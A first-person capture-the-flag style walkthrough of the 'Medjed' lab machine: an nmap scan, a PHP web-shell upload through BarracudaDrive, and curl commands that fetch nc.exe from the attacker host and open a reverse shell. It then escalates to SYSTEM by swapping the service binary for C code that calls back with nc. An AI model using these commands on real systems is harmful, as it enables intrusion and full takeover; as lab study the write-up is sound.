Machine Information
- Machine Name: Medjed
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
Nmap scan report for 192.168.160.127
Host is up, received user-set (0.019s latency).
Scanned at 2024-10-06 13:54:44 +08 for 585s
Not shown: 65517 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql? syn-ack ttl 125
| mysql-info:
|_ MySQL Error: Host '192.168.251.160' is not allowed to connect to this MariaDB server
| fingerprint-strings:
| NULL:
|_ Host '192.168.251.160' is not allowed to connect to this MariaDB server
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8000/tcp open http-alt syn-ack ttl 125 BarracudaServer.com (Windows)
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
| Supported Methods: OPTIONS GET HEAD PROPFIND PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK POST
|_ Potentially risky methods: PROPFIND PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Windows)
|_http-title: Home
| fingerprint-strings:
| FourOhFourRequest, Socks5:
| HTTP/1.1 200 OK
| Date: Sun, 06 Oct 2024 05:55:22 GMT
| Server: BarracudaServer.com (Windows)
| Connection: Close
| GenericLines, GetRequest:
| HTTP/1.1 200 OK
| Date: Sun, 06 Oct 2024 05:55:17 GMT
| Server: BarracudaServer.com (Windows)
| Connection: Close
| HELP4STOMP:
| HTTP/1.1 200 OK
| Date: Sun, 06 Oct 2024 05:58:14 GMT
| Server: BarracudaServer.com (Windows)
| Connection: Close
| HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Date: Sun, 06 Oct 2024 05:55:27 GMT
| Server: BarracudaServer.com (Windows)
| Connection: Close
| OfficeScan:
| HTTP/1.1 200 OK
| Date: Sun, 06 Oct 2024 05:58:09 GMT
| Server: BarracudaServer.com (Windows)
| Connection: Close
| SIPOptions:
| HTTP/1.1 400 Bad Request
| Date: Sun, 06 Oct 2024 05:56:42 GMT
| Server: BarracudaServer.com (Windows)
| Connection: Close
| Content-Type: text/html
| Cache-Control: no-store, no-cache, must-revalidate, max-age=0
| <html><body><h1>400 Bad Request</h1>Can't parse request<p>BarracudaServer.com (Windows)</p></body></html>
| apple-iphoto:
| HTTP/1.1 400 Bad Request
| Date: Sun, 06 Oct 2024 05:59:34 GMT
| Server: BarracudaServer.com (Windows)
| Connection: Close
| Content-Type: text/html
| Cache-Control: no-store, no-cache, must-revalidate, max-age=0
|_ <html><body><h1>400 Bad Request</h1>HTTP/1.1 clients must supply "host" header<p>BarracudaServer.com (Windows)</p></body></html>
|_http-favicon: Unknown favicon MD5: FDF624762222B41E2767954032B6F1FF
| http-webdav-scan:
| Server Date: Sun, 06 Oct 2024 06:04:11 GMT
| Server Type: BarracudaServer.com (Windows)
| Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_ WebDAV type: Unknown
30021/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 536 Nov 03 2020 .gitignore
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 app
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 bin
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 config
| -r--r--r-- 1 ftp ftp 130 Nov 03 2020 config.ru
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 db
| -r--r--r-- 1 ftp ftp 1750 Nov 03 2020 Gemfile
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 lib
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 log
| -r--r--r-- 1 ftp ftp 66 Nov 03 2020 package.json
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 public
| -r--r--r-- 1 ftp ftp 227 Nov 03 2020 Rakefile
| -r--r--r-- 1 ftp ftp 374 Nov 03 2020 README.md
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 test
| drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 tmp
|_drwxr-xr-x 1 ftp ftp 0 Nov 03 2020 vendor
|_ftp-bounce: bounce working!
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
33033/tcp open unknown syn-ack ttl 125
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| GetRequest, HTTPOptions:
| HTTP/1.0 403 Forbidden
| Content-Type: text/html; charset=UTF-8
| Content-Length: 3102
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <title>Action Controller: Exception caught</title>
| <style>
| body {
| background-color: #FAFAFA;
| color: #333;
| margin: 0px;
| body, p, ol, ul, td {
| font-family: helvetica, verdana, arial, sans-serif;
| font-size: 13px;
| line-height: 18px;
| font-size: 11px;
| white-space: pre-wrap;
| pre.box {
| border: 1px solid #EEE;
| padding: 10px;
| margin: 0px;
| width: 958px;
| header {
| color: #F0F0F0;
| background: #C52F24;
| padding: 0.5em 1.5em;
| margin: 0.2em 0;
| line-height: 1.1em;
| font-size: 2em;
| color: #C52F24;
| line-height: 25px;
| .details {
|_ bord
44330/tcp open ssl/unknown syn-ack ttl 125
| ssl-cert: Subject: commonName=server demo 1024 bits/organizationName=Real Time Logic/stateOrProvinceName=CA/countryName=US/organizationalUnitName=SharkSSL/emailAddress=ginfo@realtimelogic.com/localityName=Laguna Niguel
| Issuer: commonName=demo CA/organizationName=Real Time Logic/stateOrProvinceName=CA/countryName=US/organizationalUnitName=SharkSSL/emailAddress=ginfo@realtimelogic.com/localityName=Laguna Niguel
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-08-27T14:40:47
| Not valid after: 2019-08-25T14:40:47
| MD5: 3dd3:7bf7:464d:a77b:6d04:f44c:154b:7563
| SHA-1: 3dc2:5fc6:a16f:1c51:8eee:45ce:80cf:b35e:7f92:ebbe
| -----BEGIN CERTIFICATE-----
| MIICsTCCAhoCAQUwDQYJKoZIhvcNAQEEBQAwgZkxCzAJBgNVBAYTAlVTMQswCQYD
| VQQIEwJDQTEWMBQGA1UEBxMNTGFndW5hIE5pZ3VlbDEYMBYGA1UEChMPUmVhbCBU
| aW1lIExvZ2ljMREwDwYDVQQLEwhTaGFya1NTTDEQMA4GA1UEAxMHZGVtbyBDQTEm
| MCQGCSqGSIb3DQEJARYXZ2luZm9AcmVhbHRpbWVsb2dpYy5jb20wHhcNMDkwODI3
| MTQ0MDQ3WhcNMTkwODI1MTQ0MDQ3WjCBpzELMAkGA1UEBhMCVVMxCzAJBgNVBAgT
| AkNBMRYwFAYDVQQHEw1MYWd1bmEgTmlndWVsMRgwFgYDVQQKEw9SZWFsIFRpbWUg
| TG9naWMxETAPBgNVBAsTCFNoYXJrU1NMMR4wHAYDVQQDExVzZXJ2ZXIgZGVtbyAx
| MDI0IGJpdHMxJjAkBgkqhkiG9w0BCQEWF2dpbmZvQHJlYWx0aW1lbG9naWMuY29t
| MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDI9kHT2xeC8GaBWFcTTqBLU2iF
| Jt8gu5khgjW1LMkOQ1GgX53+siZP4QxPaua0pIEaGXh/qe1wYmucEjxJvidsyFyN
| vgUjS7yP8AMCRGqdxhkbM4A5mcnmxu/8cRxFf19CIVnsD+netpHrscJfmk5f70cz
| QLQQ2NlT8exLSh+5cQIDAQABMA0GCSqGSIb3DQEBBAUAA4GBAJFWpZDFuw9DUEQW
| Uixb8tg17VjTMEQMd136md/KhwlDrhR2Dqk3cs1XRcuZxEHLN7etTBm/ubkMi6bx
| Jq9rgmn/obL94UNkhuV/0VyHQiNkBrjdf4eY6zNY71PgVBxC0wULL5pcpfo0xUKc
| IDMYIaRX7wyNO/lZcxIj0xmxTrqu
|_-----END CERTIFICATE-----
|_ssl-date: 2024-10-06T06:04:27+00:00; 0s from scanner time.
45332/tcp open http syn-ack ttl 125 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
|_http-title: Quiz App
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
45443/tcp open http syn-ack ttl 125 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
| http-methods:
| Supported Methods: HEAD GET POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
|_http-title: Quiz App
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Few web ports and ftp ports opened. Let’s explore each and see which is useful.
Port 8000
I started out with this web port.
Some useful information gained from this is “BarracudaDrive” website builder. It seems like the website is asking me to complete some configuration wizard before I could user the server. After clicking it, the website redirects me to a page where I could just set an administrator account.
I just create it and see how it works. After registering it, I manage to login the website as admin user. There’s a “Web-File-Server” where I could go through the file server.
Since I have read and write access on this fs, I just go through and explore it.
After playing around, I noticed that this file server has high privilege users as it could even go through the Administrator directories. But since I could not get shell from here, I figured out that I might be able to get a reverse shell if I could upload a malicious php file.
After uploading the vuln.php, its time to trigger it. It seems like this xampp web server is running on a different port. So lets figure out the other ports.
Port 45332 / 45443
After looking around, this 2 ports seems suspicious and I looked into it. Both the ports works exactly same and I could just go to the vuln.php that I have uploaded from port 8000.
I managed to get RCE from this method and its time to get reverse shell.
1
2
curl 'http://192.168.160.127:45332/vuln.php?123=curl%20192.168.45.205:8000/windows/nc.exe%20-O'
curl 'http://192.168.160.127:45332/vuln.php?123=.\nc.exe 192.168.45.205 1234 -e cmd'
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.205] from (UNKNOWN) [192.168.160.127] 50205
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs>whoami
whoami
medjed\jerren
Since I’m not Administrator user, its time to privilege escalation.
Privilege Escalation
When I was looking into BarracudaDrive, there’s a version number provided in the about page.
When I was googling that, I came across this exploit https://www.exploit-db.com/exploits/48789 which I think it is possible to perform privilege escalation.
1
2
3
4
5
6
7
8
C:\bd>icacls C:\bd\bd.exe
icacls C:\bd\bd.exe
C:\bd\bd.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
It seems like I have the exact same insecure file permission for bd.exe.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\bd>sc qc bd
sc qc bd
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bd
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\bd\bd.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BarracudaDrive ( bd ) service
DEPENDENCIES : Tcpip
SERVICE_START_NAME : LocalSystem
The service will also auto start, which means that I’ll just need to restart the machine and it will execute the bd.exe that I have modified.
1
2
3
4
5
6
7
8
9
10
#include <stdlib.h>
int main ()
{
int i;
i = system ("C:\\xampp\\htdocs\\nc.exe 192.168.45.205 1235 -e cmd");
return 0;
}
I’ll will be using this C code and compile it into exe file and replace with the bd.exe. The command to compile C code to exe in linux is x86_64-w64-mingw32-gcc a.c -o test.exe.
1
2
3
4
5
6
7
8
9
C:\bd>curl 192.168.45.205:8000/test.exe -O
curl 192.168.45.205:8000/test.exe -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 110k 100 110k 0 0 110k 0 0:00:01 --:--:-- 0:00:01 1015k
C:\bd>move test.exe bd.exe
move test.exe bd.exe
1 file(s) moved.
Now I’ll just need to make sure that I could restart the machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
C:\bd>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
As long as the privilege is mentioned there, I should be able to restart it even if the state is disabled. Now it’s time to restart.
1
2
3
C:\bd>shutdown /r /f
shutdown /r /f
Now wait for the machine to restart and I should be able to get the reverse shell.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.205] from (UNKNOWN) [192.168.160.127] 49669
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
Tada ~ I managed to get a shell with NT Authority System.
Things I learned from this machine
- Always try to write malicious php file into the common web hosting directory if possible
- whatever barracuda thingy
- compiling C code to exe in linux